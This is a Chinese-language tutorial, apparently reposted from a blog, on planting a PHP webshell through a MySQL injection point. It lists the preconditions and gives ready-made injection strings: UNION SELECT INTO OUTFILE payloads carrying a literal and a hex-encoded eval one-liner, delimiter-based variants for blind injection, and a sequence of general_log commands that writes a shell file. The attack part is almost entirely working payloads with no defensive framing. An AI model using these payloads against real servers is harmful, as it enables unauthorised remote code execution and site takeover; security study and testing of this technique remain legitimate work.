• MySQL注入点写入webshell


    MySQL注入点写入webshell

    • 条件
      • MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。

        • 通过命令查看secure-file-priv的当前值,确认是否允许导入导出以及到处文件路径。
          show variables like '%secure_file_priv%';
        • secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
        • 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
        • 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制,即secure_file_priv=""
      • MySQL的当前用户拥有的权限可以执行 select into outfile操作。

      • 当secure_file_priv文件导出路径与web目录路径重叠,写入Webshell才可以被访问到。

    • 注入方式
      • 利用Union select 写入
        • 具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。
        • 执行语句 :
          ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'
          ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"
      • 利用分隔符写入
        • 当Mysql注入点为盲注或报错,Union select写入的方式显然是利用不了的,那么可以通过分隔符写入。SQLMAP的 --os-shell命令,所采用的就是一下这种方式。

        • 具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径

        • 执行语句

          • ?id=1 INTO OUTFILE '物理路径' lines terminated by (一句话hex编码)#
          • ?id=1 INTO OUTFILE '物理路径' fields terminated by (一句话hex编码)#
          • ?id=1 INTO OUTFILE '物理路径' columns terminated by (一句话hex编码)#
            *?id=1 INTO OUTFILE '物理路径' lines starting by (一句话hex编码)#
      • 利用log写入
        • 新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。
        • 具体权限要求:数据库用户需具备Super和File服务器权限、获取物理路径。
        • show variables like '%general%'; #查看配置
        • set global general_log = on; #开启general log模式
        • set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址
        • select '<?php eval($_GET[g]);?>' #写入shell
        • set global general_log=off; #关闭general log模式
  • 相关阅读:
    codeforces 820 D. Mister B and PR Shifts(思维)
    codeforces 820 C. Mister B and Boring Game(找规律)
    玲珑杯 1137
    codeforces 817 D. Imbalanced Array(单调栈+思维)
    Atcoder D
    Atcoder C
    Atcode B
    codeforces 816 E. Karen and Supermarket(树形dp)
    codeforces 816 D. Karen and Test(逆元+思维+组合数)
    codeforces 816 C. Karen and Game(模拟+思维)
  • 原文地址:https://www.cnblogs.com/hacker-snail/p/14096955.html
Copyright © 2020-2023  润新知